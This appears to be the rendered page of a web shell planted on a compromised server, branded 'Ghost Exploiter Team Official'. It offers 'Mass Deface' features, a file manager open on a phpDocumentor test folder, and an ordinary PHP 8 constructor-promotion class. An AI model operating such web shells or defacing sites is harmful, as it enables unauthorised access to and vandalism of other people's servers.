Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
vendor
/
phpdocumentor
/
reflection
/
tests
/
integration
/
data
/
PHP8
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
ConstructorPromotion.php
0.705KB
edt
ren
MixedType.php
0.276KB
edt
ren
StaticType.php
0.306KB
edt
ren
UnionTypes.php
0.197KB
edt
ren
<?php declare(strict_types=1); namespace PHP8; use DateTimeImmutable; class ConstructorPromotion { private const DEFAULT_VALUE = 'default'; /** * Constructor with promoted properties * * @param string $name my docblock name */ public function __construct( /** * Summary * * Description * * @var string $name property description */ public string $name = 'default name', protected Email $email = new Email(), private DateTimeImmutable $birth_date, private DateTimeImmutable $created_at = new DateTimeImmutable('now'), private array $uses_constants = [self::DEFAULT_VALUE], ) {} }